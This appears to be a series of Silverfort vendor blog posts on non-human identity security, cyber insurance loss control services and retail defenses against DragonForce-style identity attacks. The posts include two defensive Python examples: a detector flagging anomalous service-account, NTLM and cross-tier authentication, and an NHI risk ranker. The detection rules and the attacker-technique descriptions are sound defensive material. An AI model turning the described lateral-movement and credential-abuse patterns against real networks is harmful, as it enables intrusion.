We also found that 37% of service accounts are what we call “interactive”. These are service accounts that appear to be “interacted” with by employees—or attackers—to bypass privileged access controls.
(Figure: Service accounts can be interacted with to bypass privileged access controls)

It began with human admins creating service accounts across multiple systems, apps, platforms and services without a centralized view of what they are responsible for, who created and owns them, and what they need access to. For most organizations, there has never been a single source of truth for NHIs, nor any standardized onboarding, offboarding, or ownership processes, leaving their inventories incomplete at best.

(Figure: Most organizations have either medium or low visibility into service accounts)

### Securing your NHIs is a must, not a nice-to-have

Threat actors have already realized what many organizations have not: non-human identities are often the weakest link in an enterprise’s identity fabric.

1. API key or token theft. Internet Archive Breach (October 2024): Attackers exploited unrotated API keys leaked from the Internet Archive's GitLab repository, gaining access to over 800,000 support tickets containing sensitive user information.
2. Overprivileged service accounts. Dropbox Sign Breach (May 2024): Attackers compromised a backend service account with excessive privileges, accessing the customer database and exposing sensitive user data, including email addresses, usernames, hashed passwords, API keys, and OAuth tokens.
3. OAuth application abuse. Microsoft and Okta Attacks: Nation-state actors have been seen abusing OAuth applications to move laterally across cloud environments. Major software companies like Microsoft and Okta have fallen victim to attacks leveraging compromised machine identities, highlighting the vital need to connect non-human identities with their human counterparts for complete visibility and protection.

These aren’t isolated incidents—they reflect a systemic trend. NHIs are now integral to one of the most exploited attack vectors: identity.
Unlike human identities, NHIs cannot be protected by the most common safeguards, such as MFA, creating a vast, invisible, and vulnerable attack surface that many defenders are ill-equipped to secure.

It’s easy to see the trend at play here. While organizations have invested heavily in securing human users, NHIs still fly under the radar. But all is not lost—there is something they can do about it.

### A new approach: Silverfort’s expanded NHI Security

Recognizing the growing risk and operational complexity around NHIs, we have expanded our Non-Human Identity Security capabilities to provide continuous protection and visibility for all NHIs—including NHIs on-prem and in the cloud. This includes:

- Unified coverage for both on-prem and cloud NHIs.
- Complete discovery and ownership mapping.
- Real-time, scalable protection of service accounts with virtual fencing.
- Seamless integration across platforms.

Learn more about our expanded NHI security offering, and how it can help you find and map your unknown NHIs, enforce security controls and remediate misconfigurations and identity weaknesses with actionable recommendations.

### Final thoughts

Non-human identities are no longer a niche IT concern—they are a central pillar of enterprise infrastructure and a rapidly expanding attack surface all their own. The evidence is clear: NHIs are everywhere, they have elevated access, and they’re largely invisible to traditional security controls. As attackers increasingly exploit this blind spot, organizations must act quickly to secure their non-human identity landscape.

The path forward starts with visibility, is strengthened through policy enforcement, and culminates in continuous, adaptive protection, so every dimension of identity is known and secured.
Read the full report here

---

- Published: 2025-05-12
- Modified: 2025-05-12
- URL: https://www.silverfort.com/blog/loss-control-services-one-of-the-most-underused-tools-for-reducing-identity-security-risk/

Cyber insurers are offering tools that could significantly reduce your identity risk—but most organizations aren’t using them. One of the most significant advancements in the sector is the increased emphasis on loss control services. These services are designed to mitigate risk, enhance cybersecurity postures, and ultimately reduce the frequency and severity of cyber-related claims. Many of them are free of charge or discounted, as carriers and brokers have negotiated prices with many different vendors. In this blog, we’ll explore what loss control services are, why they matter for reducing identity security risk, and how you can use them to strengthen both your cyber insurance coverage and your security posture.

### What are loss control services?

Loss control services in the cyber insurance space refer to proactive risk management strategies insurers provide to policyholders—often at no cost or a reduced rate. These services are typically offered annually upon policy renewal and give organizations access to expert guidance and tools that support stronger cyber hygiene and risk posture. Loss control services include:

- Security assessments: Identifying security risk exposures in an organization's cybersecurity framework. These assessments typically evaluate network architecture, endpoint protections, patching practices, and policy enforcement to find security blind spots.
- Identity risk assessments: Evaluating identity-related exposures that increase the likelihood of a cyber incident. These assessments help uncover gaps in security controls enforcement, including multifactor authentication (MFA), security of non-human identities (NHIs), including on-prem service accounts, and privileged access—key factors in mitigating credential-based attacks and lateral movement.
- Employee training: Educating staff on best practices to prevent cyber breaches. Training programs often focus on raising employees’ awareness of phishing attacks, password hygiene, secure data handling, and incident reporting protocols.
- Incident response planning: Helping organizations develop effective strategies for risk mitigation, incident response and remediation. These services guide security teams through playbook creation, communication planning, and response action items to ensure faster recovery during real incidents.
- Endpoint protection solutions: Implementing modern cybersecurity tools to protect networks and devices. This covers deploying EDR/XDR platforms, hardening configurations, and improving visibility into endpoint behaviors across hybrid environments.
- Compliance assistance: Supporting organizations in aligning with industry regulations and standards like GDPR, HIPAA, and NIST. It includes security policy gap analysis, audit preparation, and mapping security controls to regulatory frameworks.

Beyond improving baseline security, loss control services help organizations mitigate the specific risk factors that drive cyber insurance decisions. These include identity-related exposure, incident response readiness, and the maturity level of security controls within the environment.

### Why are loss control services important for insureds?

While the cyber insurance market has softened, the risk of ransomware and identity-based attacks remains high. Organizations of all sizes, from SMBs to the Fortune 500, can be affected, and the cost can be substantial. The increasing frequency and severity of cyberattacks has led insurers to re-evaluate their risk mitigation strategies. Loss control services are now a critical component of cyber insurance policies because they help reduce the frequency of claims by proactively addressing security exposures, and lower claim severity by enabling faster, more effective incident response.
They also enhance risk selection by giving underwriters greater visibility into a policyholder’s cybersecurity posture, which can lead to more favorable terms, fewer restrictions, and improved pricing. Finally, loss control services strengthen relationships between insurers and insureds by providing ongoing value and support in an increasingly competitive market.

### Don’t leave your cyber insurance potential untapped. Leverage loss control services.

If you are not taking full advantage of the loss control services your broker and carrier offer, you are leaving real value and protection on the table. In today’s cyber insurance market, loss control is not just helpful; it is essential. These services are designed to proactively strengthen your identity security posture, reduce the likelihood of costly claims, and help you negotiate better coverage terms.

Cyber threats are evolving fast, and insurers are rewarding businesses that invest in risk management. The more you use the tools and expertise available to you, the more resilient and insurable your business becomes. Before you renew or purchase your next policy, make it a priority to explore what loss control services are included. The right support could mean the difference between surviving a cyberattack and suffering major losses.

Protect your business, maximize your coverage, and get the full value you are paying for. Start by asking: what loss control services are available to me?

Begin with the Identity Risk Assessment—a strategic step towards strengthening insurability. Learn more about the Identity Risk Assessment.

---

- Published: 2025-05-07
- Modified: 2025-06-23
- URL: https://www.silverfort.com/blog/defending-retail-against-identity-threats-what-you-can-do-today/

In recent weeks, several major UK retail brands, including M&S, Harrods, and the Co-operative Group, have suffered significant cyberattacks disrupting business operations.
These incidents are claimed to have been orchestrated by the DragonForce ransomware group.

As a former Head of IAM at a major retailer, I’ve been part of the response to identity-first attackers, and I have deep empathy for the teams who are working tirelessly to respond and recover. While the full scope of these breaches is still coming to light, early signs point to an identity-first threat actor. DragonForce is known to exploit identity weaknesses and then move laterally using compromised credentials. Their methodology highlights something we've been saying for years: identity is the new battleground. These attackers target who you are rather than what you have.

While you can’t fix everything in a day, I’ve outlined a few steps that, based on my experience, identity and security teams can take now to get closer to where they want to be.

### Understanding the attacker: An identity-first approach

So, who are these attackers, and how do they operate? DragonForce uses similar TTPs to Scattered Spider and is known to use phishing emails, exploit known vulnerabilities, and leverage stolen credentials to gain initial access to victim networks. Their playbook starts with the most vulnerable link in any security chain: humans. They're masters of social engineering, crafting convincing phishing campaigns, executing SIM swaps to hijack phone numbers, and launching "MFA fatigue" attacks where they bombard users with authentication requests until someone simply gives in and approves one. They're particularly fond of targeting helpdesk staff, manipulating them into resetting passwords and providing that crucial first foothold.

Once inside, they move methodically. They look for accounts protected by just a username and password, using these to move through networks. Service accounts—non-human identities that keep systems running but often fly under the radar—are frequent targets, offering privileged access with minimal monitoring.
From there, it's a matter of increasing their privileges and positioning themselves to deploy ransomware where it hurts most. What makes this approach so devastating in retail isn't just the sophistication; it's that it exploits blind spots that are particularly common in retail environments.

### Retail's complex identity landscape

If you work in retail security, you're already facing unique challenges that make identity protection especially difficult. You manage tens, hundreds or thousands of locations—plus online businesses—that all need consistent security controls despite varying local conditions and operational constraints.

Your infrastructure is a complex hybrid of on-prem systems alongside newer cloud environments, all of which need protecting. Your critical systems may have been in place for many years, designed before modern identity security was even a consideration.

Your operations likely rely on countless third-party vendors and service providers, each requiring specific access to your systems. Meanwhile, you’re enabling frontline workers with corporate accounts for greater business efficiency and security, but in doing so, you’re inadvertently multiplying your identity attack surface. All the while, you’re managing a workforce that grows rapidly with seasonal demand, making identity governance a constantly moving target.

These realities mean a large attack surface for identity-based threat actors to exploit. Admin accounts often lack proper oversight and protection. Non-human identities, from Active Directory service accounts to cloud workloads, frequently operate with extensive access and minimal monitoring. MFA implementation is typically inconsistent, especially for backend systems. And the interconnected nature of retail environments creates countless pathways for attackers to move between systems once they've gained initial access.
### Building retail-specific identity defenses

The recent retail breaches can act as a catalyst for identity and security teams to revisit and accelerate key initiatives—especially those that may have already faced pushback from teams focused on operational efficiency. Moments like these can help align priorities across the organization. If I were in their shoes, here’s what I’d focus on right now:

#### 1. Protect initial access points

- Enforce comprehensive MFA: Verify that all external access points to systems are secured with MFA, including VPNs, SaaS applications, and other internet-facing systems.
- Implement phishing-resistant MFA: Move to number matching at minimum (remember to remove non-phishing-resistant factors too) and consider “unphishable” FIDO2 authenticators (like YubiKeys) for prime targets, like IT and security teams.
- Secure password reset processes: Harden helpdesk procedures with strict identity verification protocols. Consider temporarily implementing in-person resets for your most critical accounts.
- Protect MFA management: Ensure second factors can only be added or changed with appropriate identity verification, not just with a username and password.

#### 2. Prevent lateral movement post-compromise

- Extend MFA coverage internally: MFA must extend beyond the perimeter to internal systems and infrastructure access, especially Active Directory environments that are prime targets for threat actors and ransomware groups. Protecting RDP alone is not enough—this must cover all protocols (PowerShell, for example, is favoured by attackers).
- Protect non-human identities (NHIs): Implement strict controls on service accounts, limiting where they can be used and alerting on any unusual activity patterns that could indicate compromise.
- Contain vulnerable legacy protocols: Restrict legacy authentication protocols like NTLMv1 to the applications that absolutely require them.
- Implement identity segmentation: Create security boundaries between different parts of the retail environment to contain breaches; for example, by disallowing server authentication from your retail sites.

#### 3. Monitor for identity threats

- Deploy Identity Threat Detection & Response: Implement ITDR to identify anomalous behaviors like lateral movement attempts and equip your SOC to respond.
- Focus on service account activity: Create detailed baselines of normal service account behavior and alert on deviations.
- Monitor privileged account usage: Track admin account activity with particular attention to cross-tier usage where high-privilege accounts access lower-security environments.

### Real world protection in action

This isn't just theoretical advice; it's based on real battles against the exact threats targeting retailers today.

Take the case of a Silverfort customer who faced a lateral movement attack similar to what M&S is experiencing now. Attackers had already compromised two administrator accounts and a service account, typically a recipe for disaster. But because the customer had implemented MFA across all internal systems and automated service account protection, they detected and blocked the attack in its early stages, preventing what could have been catastrophic damage to their operations. You can read the full case study here.

Or consider another organisation, a leading manufacturer, that prevented lateral movement during a sophisticated supply chain attack. Nation-state actors had compromised a factory network and were attempting to pivot into the company's domain environment through employees' laptops. By implementing policies that detected and blocked unusual authentication attempts, particularly those using vulnerable protocols like NTLM, their security team stopped the attack before it could establish a foothold. This detailed case study is available here.
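Several of the steps above (baselining service account behaviour and alerting on deviations, containing NTLM, disallowing server authentication from retail sites, and watching for cross-tier admin usage) reduce to rules a SOC can run over authentication events. The Python below is an added example of what those rules look like in code; it is written for this post, not taken from it, and is not Silverfort's detection logic. Everything in it is constructed: the `timestamp|account|source_host|target_host|protocol|logon_type` record format, the account inventories, and the host naming convention (STORE-nnn-* for retail sites, DC* for domain controllers, WS-* for workstations) that expresses the segmentation and tiering rules.

```python
"""Added example, not from the post and not Silverfort's detection logic: a small
baseline-and-deviate check for service accounts plus the identity-segmentation and
cross-tier rules the post recommends, run over constructed authentication records.

Assumptions (all constructed): the record format
timestamp|account|source_host|target_host|protocol|logon_type, the account inventories,
and the host naming convention (STORE-nnn-* for retail sites, DC* for domain
controllers, WS-* for workstations) used to express the rules."""
import re
from collections import defaultdict

SERVICE_ACCOUNTS = {"svc_backup", "svc_pos_sync"}   # constructed NHI inventory
TIER0_ADMINS = {"adm_dc_ops"}                       # constructed privileged-account inventory
INTERACTIVE_LOGONS = {"interactive", "rdp"}         # a service account should never log on this way

# Learning window (constructed): what the service accounts normally do.
BASELINE_LOG = """\
2025-04-01T02:00:00|svc_backup|SRV-BK01|FS01|kerberos|service
2025-04-02T02:00:00|svc_backup|SRV-BK01|FS02|kerberos|service
2025-04-01T06:00:00|svc_pos_sync|STORE-017-POS1|SRV-POS01|kerberos|network
2025-04-02|svc_pos_sync|STORE-042-POS1|SRV-POS01|kerberos|network
"""

# Detection window (constructed): one day with a few events that should fire.
NEW_LOG = """\
2025-05-05T02:00:00|svc_backup|SRV-BK01|FS01|kerberos|service
2025-05-05T06:00:00|svc_pos_sync|STORE-101-POS1|SRV-POS01|kerberos|network
2025-05-05T06:03:00|svc_pos_sync|STORE-101-POS1|DC01|kerberos|network
2025-05-05T09:00:00|alice|WS-ALICE|FS01|kerberos|interactive
2025-05-05T11:30:00|adm_dc_ops|WS-HELPDESK07|DC01|kerberos|rdp
2025-05-05T14:12:31|svc_backup|WS-HELPDESK07|FS01|ntlm|interactive
2025-05-05T14:20:05|svc_backup|WS-HELPDESK07|DC01|ntlm|network
"""

FIELDS = ("ts", "account", "source", "target", "protocol", "logon_type")


def parse(log: str) -> list:
    return [dict(zip(FIELDS, line.split("|"))) for line in log.splitlines() if line]


def host_class(host: str) -> str:
    """Collapse per-store hosts to one class so a fleet-wide account is not 'new' at every store."""
    return re.sub(r"^STORE-\d+-", "STORE-*-", host)


def is_retail_site(host: str) -> bool:
    return host.startswith("STORE-")


def is_domain_controller(host: str) -> bool:
    return host.startswith("DC")


def is_workstation(host: str) -> bool:
    return host.startswith("WS-")


def build_baseline(events: list) -> dict:
    """Per service account: the source host classes, targets and protocols seen in the learning window."""
    base = defaultdict(lambda: {"sources": set(), "targets": set(), "protocols": set()})
    for e in events:
        if e["account"] in SERVICE_ACCOUNTS:
            b = base[e["account"]]
            b["sources"].add(host_class(e["source"]))
            b["targets"].add(e["target"])
            b["protocols"].add(e["protocol"])
    return base


def evaluate(events: list, baseline: dict) -> list:
    """Return (timestamp, account, [reasons]) for every event that violates a rule."""
    alerts = []
    for e in events:
        acct, reasons = e["account"], []
        if acct in SERVICE_ACCOUNTS:
            b = baseline[acct]
            if e["logon_type"] in INTERACTIVE_LOGONS:
                reasons.append("interactive logon by service account")
            if e["protocol"] == "ntlm" and "ntlm" not in b["protocols"]:
                reasons.append("NTLM authentication outside baseline")
            if host_class(e["source"]) not in b["sources"]:
                reasons.append(f"new source {e['source']}")
            if e["target"] not in b["targets"]:
                reasons.append(f"new target {e['target']}")
        if acct in TIER0_ADMINS and (is_workstation(e["source"]) or is_workstation(e["target"])):
            reasons.append("tier-0 admin account used from or against a workstation")  # cross-tier usage
        if is_retail_site(e["source"]) and is_domain_controller(e["target"]):
            reasons.append("retail site authenticating to a domain controller")  # segmentation rule
        if reasons:
            alerts.append((e["ts"], acct, reasons))
    return alerts


def detect() -> list:
    return evaluate(parse(NEW_LOG), build_baseline(parse(BASELINE_LOG)))


if __name__ == "__main__":
    for ts, acct, why in detect():
        print(ts, acct, "; ".join(why))
```

Two design choices matter in practice. First, `host_class` keys the baseline on a host class rather than a hostname, so an account legitimately used from hundreds of tills does not page the SOC every time a new store opens, while a helpdesk workstation using that account still stands out. Second, the rules are layered: a single event can trip a behavioural deviation, a protocol rule and a segmentation rule at once, and the combined reasons are what make the alert worth a human's time.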
### Secure today, build for tomorrow

While these immediate actions will help contain identity risks quickly, there are other protections to consider that are longer-term investments. Identity Security Posture Management (ISPM) can proactively discover and address identity weaknesses before attackers find them. Create a true "closed loop" of identity security where account setup and recovery processes require strong verification at every step.

Look at automating your identity lifecycle, with special attention to the often-overlooked non-employee and non-human identities. Reduce reliance on local accounts that bypass central identity controls, and begin the journey toward zero standing privileges, where access is provided just in time and just enough, dramatically reducing the attack surface that DragonForce, Scattered Spider and similar groups exploit.

For your non-human identities, consider moving toward ephemeral credentials rather than static, high-risk credentials like long-lived service account passwords, secrets, API keys, and SSH keys. This eliminates one of the most pervasive risks in retail environments—compromised service account credentials that provide attackers with persistent access.

### Mind the identity gap

Traditional approaches to securing identities simply aren't sufficient against today's identity-focused attackers, where every account and authentication presents a risk. For retailers, where system availability directly impacts the bottom line and customer trust is paramount, getting identity security right—containing the risk of account compromise, lateral movement and ultimately ransomware—is essential.

By understanding how groups like DragonForce operate and implementing comprehensive identity security measures, you can significantly reduce your risk profile. As we've seen from real-world examples, properly implementing identity security can be the difference between business as usual and a headline-hitting breach.
Download our ebook, Identity Security in Retail: How to Prevent Ransomware and Thwart Lateral Identity Attacks.

---

- Published: 2025-05-06
- Modified: 2025-05-08
- URL: https://www.silverfort.com/blog/uncovering-the-hidden-threat-securing-cloud-non-human-identities-with-silverfort/

As innovation in identity security evolves by the day, so does the attack surface. Nothing is growing faster than cloud-based non-human identities (NHIs).

These machine identities are growing at a staggering rate. They run critical workloads, automated processes, and cloud-native applications, and in most organizations, they now outnumber human identities 50 to 1. While they are critical to keeping operations running, they are also one of the biggest security blind spots in an organization's cloud identity security stack.

Most organizations have limited visibility into how many NHIs exist in their cloud environment, what they can access, where they reside, and who manages them. These machine identities are regularly created on the fly, left untracked, and operate with long-lived credentials and overprivileged access, making them prime targets for compromise. There is no standard onboarding process, offboarding rarely occurs, and ownership is unclear at best, leaving accountability completely absent from the process. As a consequence, orphaned and unmanaged NHIs silently accumulate, expanding the attack surface and providing low-hanging fruit for attackers.

In this post, we will unpack the different blind spots and risks associated with cloud NHIs before exploring the key ways you can resolve them with our newly expanded cloud NHI security capabilities.

## Cloud NHI blind spots: What you can’t see will hurt you

When organizations fail to properly manage and monitor cloud NHIs, they create critical security blind spots that are easy to overlook but challenging to defend.
These identities often slip through the cracks because they aren’t tied to a human owner, despite retaining persistent access to critical systems, services, and data.

Without clear visibility into the details of each NHI and their activities, why they're created, and what level of access they hold, organizations lose control over a rapidly growing and less visible layer of their cloud environment. Over time, unmanaged NHIs accumulate unchecked, expanding the attack surface and introducing hidden pathways for attackers to exploit. These blind spots aren’t just oversights; they are structural weaknesses in your cloud security posture.

What are the most critical security blind spots organizations face with cloud NHIs?

- Discovery gaps: Limited visibility and inability to detect the full range of NHIs operating across cloud environments.
- Regularly abused: Misconfigurations and long-lived credentials allow access far beyond their intended use, creating unnecessary exposure.
- Overprivileged access: NHIs are often granted excessive permissions by default, making them highly privileged and risky if compromised.
- Complex lifecycle: With no clear ownership or governance, credentials are often not rotated or break applications when changed, while offboarding is not managed properly.

## Silverfort's NHI Security: Full coverage of cloud NHIs

For years, Silverfort has been the industry leader in securing on-prem Active Directory (AD) service accounts, providing deep visibility and control for some of the world’s most security-conscious enterprises. Now, we are bringing that same level of depth and precision to the cloud.

Silverfort enables you to automatically discover and classify all types of NHIs across cloud identity providers, infrastructures, and SaaS applications, so all identities and access paths are identified and continuously monitored.
With Silverfort's NHI Security, organizations gain full visibility into the effective privileges of every cloud NHI, uncovering excessive or unnecessary access that could pose a security risk. By continuously analyzing privilege levels across cloud environments, organizations can now easily identify and prioritize critical exposures and reduce their overall attack surface.

In addition, Silverfort helps close lifecycle and ownership gaps by mapping each NHI to a responsible owner and delivering actionable recommendations for remediation. This enables security teams to reduce risk, enforce accountability, and strengthen their overall security posture.

Silverfort uses a three-step approach to securing cloud NHIs:

1. Discover and classify the different types of NHIs
2. Prioritize the most critical exposures
3. Remediate lifecycle and security gaps

## Discover and classify

The first step in properly managing and protecting all non-human identities is knowing exactly where they reside. Here are several key questions to ask:

- What NHIs do you have?
- What do they access?
- Where do they reside and who manages them?

Once you integrate your cloud identity providers, infrastructure, or SaaS applications with Silverfort, the platform automatically identifies all cloud NHIs in your environment. This provides complete visibility into your NHI inventory. Silverfort’s ability to map NHIs by source, destination, privilege level, and security posture enables the platform to automatically identify and accurately categorize them across your cloud environment.

The variety of NHI types is classified by Silverfort into seven categories:

- Access keys: Long-lived credentials allowing programmatic access for users or NHIs to access services and resources.
- Service accounts: A dedicated identity used by applications, services, or workloads to interact with other services and systems securely, operating in a single environment or set of resources.
- IAM roles: An AWS identity assigned to a workload or user, allowing specific actions on defined resources in a system. IAM roles are not tied to specific entities and can be assumed dynamically by authorized entities, providing temporary permissions, often via identity federation or delegation.
- Tokens: Temporary credentials dynamically generated, typically as part of the authentication process. Tokens are often scoped for a specific set of permissions and are less prone to long-term security risks.
- Applications: Identities representing software systems, functioning as clients or servers in a distributed architecture. Applications are registered in IAM platforms to define how they authenticate, authorize users, integrate with other applications and services, and what actions they can perform.
- Certificates: Digital documents used to establish identity, encrypt communication, and enable secure authentication. Certificates include a public key, a private key (secret), and metadata such as expiration and issuer.
- Secrets: Sensitive data, such as passwords, API keys, or private configuration details, used to access services or authenticate users and applications. Secrets are often static string values requiring secure storage and management to prevent unauthorized access.

By discovering and classifying every type of NHI, you seamlessly gain end-to-end visibility into your entire NHI inventory—including each identity’s name, privilege level, security posture, and the sources and destinations it interacts with. This comprehensive visibility empowers you to prioritize high-risk identities, reduce exposure, and take targeted, confident action to strengthen your cloud security posture.
## Prioritize

With detailed insights into every cloud NHI in your environment—including privilege levels, usage patterns, ownership, and overall security posture—you can get a clear understanding of where security gaps and exposures exist, making it easy to shift from reactive guesswork to informed, proactive decisions. With these insights at your fingertips, you can focus on the highest-risk NHIs, cutting through the noise and zeroing in on what truly matters.

Silverfort makes it easy to prioritize NHIs based on risk level, considering factors like privilege scope, behavioral patterns, and exposure. You can also filter identities by ownership, to quickly identify which teams or users are responsible for mismanaged accounts, empowering targeted remediation and driving accountability across the organization.

With complete visibility into your cloud NHI landscape, Silverfort automatically analyzes privilege levels, access patterns, and behavioral signals to surface the most critical exposures, so you can take action. By identifying overprivileged, misconfigured, or orphaned NHIs, Silverfort enables you to prioritize what matters most, eliminate unnecessary access, and quickly close high-risk security gaps.

Through our real-time risk analysis, organizations can:

- Identify posture gaps by uncovering exposures in identity systems and processes, helping you detect weaknesses before they are exploited.
- Assess risk and prioritize remediation by focusing on the NHIs and security gaps that pose the greatest threat to your environment.
- Reduce your attack surface by remediating misconfigurations and excessive privileges, cutting down the number of exploitable entry points for attackers.

Within the NHI detail view, Silverfort delivers rich context and intuitive visualizations that reveal how and where each identity is configured. You can access key metadata directly from the connected cloud platform, including last activity, assigned roles, creator, and more.
This enables you to gain a clear view into an NHI’s effective privileges and actual usage, helping you assess associated security risks. With this visibility, you can quickly identify exposures, understand their impact, and take focused, informed steps to investigate and remediate them with confidence.

## Remediation

Now that you know where to prioritize and mitigate risk, having effective remediation is what truly closes the loop on exposures and risks. Silverfort provides dynamic and customized step-by-step guidance tailored to each specific exposure, so teams can resolve issues quickly and with confidence.

Silverfort surfaces context-aware remediation paths based on the nature and severity of each risk. Depending on the exposure, recommendations may include code snippets, smart suggestions, or multiple resolution alternatives that fit seamlessly into your existing workflows. Whether you are reducing excessive privileges or assigning ownership to orphaned accounts, every step is clear, relevant, and actionable.

By turning visibility into action, Silverfort helps you remediate both security and lifecycle gaps—strengthening your cloud NHI environment and reducing your exposure with confidence.

## Learn more about Silverfort’s Cloud NHI Security

With Silverfort’s expanded cloud NHI protection capabilities, organizations gain full visibility and control over one of the fastest-growing identity risks in the cloud. By automating the discovery, classification, and analysis of NHIs across IdPs, infrastructure, and SaaS platforms, Silverfort surfaces critical exposures and effective privileges, so you can act with precision.

Through prioritized risk insights, targeted remediation, and clear ownership mapping, Silverfort helps close visibility gaps, reduce the cloud attack surface, and apply consistent security controls, with the same trusted depth we have delivered for on-prem environments.

Learn more about Silverfort’s NHI security product here.
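To make the discover, classify and prioritize flow of this post concrete, here is an added example that ranks a constructed NHI inventory by the exposure signals the post names (orphaned, overprivileged, long-lived credentials, stale usage) and groups the flagged identities by owner. It is not Silverfort's scoring model or API; the seven NHI categories come from the post, while the inventory entries, owners, weights and thresholds are hypothetical.

```python
"""Risk-ranking a constructed cloud NHI inventory.

Added example of the discover / classify / prioritize flow described in this
post, using the seven NHI categories it lists. The inventory, the owners, the
weights and the thresholds are constructed and hypothetical; this is not
Silverfort's scoring model or API.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# The seven categories the post enumerates.
NHI_TYPES = {"access_key", "service_account", "iam_role", "token",
             "application", "certificate", "secret"}
# Types whose credentials are static and long-lived unless rotated; tokens and
# assumed IAM roles are treated as short-lived and are not checked for age.
LONG_LIVED_TYPES = {"access_key", "service_account", "certificate", "secret"}
PRIVILEGE_WEIGHT = {"read": 1, "write": 2, "admin": 4}


@dataclass(frozen=True)
class NHI:
    name: str
    kind: str
    privilege: str                 # "read", "write" or "admin"
    owner: Optional[str]           # None = no responsible owner recorded
    credential_age_days: int
    last_used_days: Optional[int]  # None = never observed in use
    destinations: tuple = ()       # systems it reaches (constructed labels)


# Constructed inventory, as a discovery step might produce it.
INVENTORY = [
    NHI("ci-deploy-key", "access_key", "admin", None, 400, 2, ("aws:prod",)),
    NHI("svc_backup", "service_account", "write", "infra-team", 30, 1, ("sql01",)),
    NHI("legacy-api-secret", "secret", "read", None, 700, None, ("billing-api",)),
    NHI("deploy-role", "iam_role", "write", "platform-team", 0, 3, ("aws:staging",)),
    NHI("old-signing-cert", "certificate", "admin", "platform-team", 200, 30, ("idp",)),
    NHI("gh-actions-token", "token", "read", "dev-team", 1, 0, ("github",)),
]


def assess(nhi, max_cred_age=90, stale_after=60):
    """Return (score, findings) for one NHI. Higher score = remediate first."""
    if nhi.kind not in NHI_TYPES:
        raise ValueError(f"unknown NHI type: {nhi.kind}")
    findings = []
    if nhi.owner is None:
        findings.append("orphaned")            # ownership / lifecycle gap
    if nhi.privilege == "admin":
        findings.append("overprivileged")      # excessive default permissions
    if nhi.kind in LONG_LIVED_TYPES and nhi.credential_age_days > max_cred_age:
        findings.append("long_lived_credential")   # never rotated
    if nhi.last_used_days is None or nhi.last_used_days > stale_after:
        findings.append("stale")               # candidate for offboarding
    # The same exposure matters more on a highly privileged identity, so the
    # number of findings is scaled by the privilege weight.
    score = PRIVILEGE_WEIGHT[nhi.privilege] * len(findings)
    return score, findings


def prioritize(inventory):
    """Return (name, score, findings) for every flagged NHI, highest risk first."""
    ranked = []
    for nhi in inventory:
        score, findings = assess(nhi)
        if score:
            ranked.append((nhi.name, score, findings))
    ranked.sort(key=lambda row: (-row[1], row[0]))
    return ranked


def by_owner(inventory):
    """Group flagged NHIs by responsible owner so each team sees its own backlog;
    identities with no owner land in the 'unassigned' bucket."""
    groups = defaultdict(list)
    for nhi in inventory:
        score, _ = assess(nhi)
        if score:
            groups[nhi.owner or "unassigned"].append(nhi.name)
    return dict(groups)


if __name__ == "__main__":
    for name, score, findings in prioritize(INVENTORY):
        print(f"{score:3d}  {name:20s} {', '.join(findings)}")
    for owner, names in by_owner(INVENTORY).items():
        print(owner, "->", names)
```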
---

- Published: 2025-04-28
- Modified: 2025-04-28
- URL: https://www.silverfort.com/blog/introducing-non-human-identity-security-nhi/

Today, Silverfort expands its deep identity protection to the cloud—bringing unmatched visibility and control to non-human identities (NHIs) across cloud providers, infrastructure, and SaaS apps, just as we’ve long done for on-prem service accounts.

There is an explosion happening in the identity landscape, and most organizations are blind to it: the growth and sprawl of non-human identities (NHIs)—service accounts, API keys, tokens, certificates, and more. What began as a small set of service accounts and machine identities has now expanded into a complex, interwoven ecosystem. These identities are essential for automating processes, securing systems, and enabling modern digital workflows, but they’re also the source of significant security exposures.

The human-to-NHI ratio, already estimated around 1:50, continues to grow. This massive scale creates an ever-expanding attack surface for every organization where these machine accounts can be compromised and provide malicious actors entry points into an organization's environment to move laterally. As organizations increasingly embrace multi-cloud environments, SaaS, and AI-driven automation, NHIs are no longer just technical components—they've become the connective tissue of modern organizations. They orchestrate and secure critical workflows across AI agents, SaaS platforms, homegrown applications, and cloud infrastructure. This dynamic web of machine-led interactions is what drives innovation and creates tangible business value. Non-human identities frequently access core data—intellectual property, customer information, financial systems—and operate at the core of business-critical infrastructure. They don’t just support growth; they drive it.

## The Problem: The Explosion of NHIs and the Security Crisis It Creates

The challenges of securing NHIs are immense.
They span cloud and on-prem environments, managed by multiple teams: IT, DevOps, Engineering, and Security. These teams don't always speak the same language when it comes to identity security, and more importantly, they lack the visibility to track and manage these identities across the ecosystem. NHIs are created by one team but modified and used by others, making ownership tracking nearly impossible.

These identities don’t operate in silos—they are interconnected across platforms and applications with complex workflows. This is even more challenging in cloud-forward environments with cloud NHIs. For example, a GitHub identity may trigger access to AWS, Azure, and other cloud environments, amplifying both the complexity and risk of the NHI ecosystem. The lack of visibility into these diverse and dynamic identities makes it nearly impossible to understand the full scope of risk. NHI risk begins from the point of creation and configuration. They span a variety of naming conventions, credential types, lifecycle states, and control planes—often with no standardized governance. Some are mistakenly configured with human credentials, while others are created directly in code or left unmanaged by DevOps pipelines, proofs of concept, and more.

From a lifecycle standpoint, NHIs have been treated as “set and forget” assets. Many were provisioned once and never touched again, despite being reused, repurposed, or misconfigured over time. This “messy middle” of the NHI lifecycle is generating additional risk for organizations.

Traditional Identity and Access Management (IAM) security tools like Privileged Access Management (PAM) and Multi-Factor Authentication (MFA) are inadequate to solve the security challenges that NHIs present. PAM is designed to manage human identities, and is not equipped to secure the dynamic, ephemeral nature of machine identities.
Traditional MFA wasn’t designed for non-human identities, which can’t authenticate like humans because they’re automated systems and services. These legacy approaches to identity security cannot keep pace with the speed and complexity of today’s dynamic attack surface.

Further, we’ve seen a rise in niche startups that address only NHIs, or even just a specific part of the NHI problem—whether it's discovery, management, or governance. While these point solutions may seem appealing, they fail to address the full picture across both human and non-human access to cloud and on-prem resources. Attackers will inevitably exploit the gaps between these solutions, leaving organizations vulnerable to compromise.

Non-human identities have already become a top attack vector. We’ve seen modern breaches originate from compromised tokens, service accounts, and unattended machine credentials — often bypassing traditional security controls entirely. Without visibility into their privilege levels and access patterns, these identities remain blind spots attackers exploit with ease.

## The Solution: Silverfort’s NHI Security, Unified Coverage for Every Type of Identity, Everywhere

